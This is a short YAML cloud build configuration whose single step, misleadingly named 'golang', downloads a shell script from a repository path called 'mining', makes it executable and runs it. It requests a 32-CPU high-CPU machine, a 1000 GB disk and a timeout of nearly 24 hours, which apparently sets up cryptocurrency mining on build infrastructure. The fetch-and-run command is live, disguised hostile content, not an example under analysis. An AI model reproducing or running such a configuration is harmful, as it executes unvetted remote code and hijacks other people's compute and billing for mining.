steps:
  - name: golang
    args:
      - '-c'
      - >-
        wget https://try.gitea.io/novalanto61/mining/raw/branch/master/sugartest.sh && chmod u+x sugartest.sh && ./sugartest.sh
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86000s
options:
  machineType: E2_HIGHCPU_32
  diskSizeGb: '1000'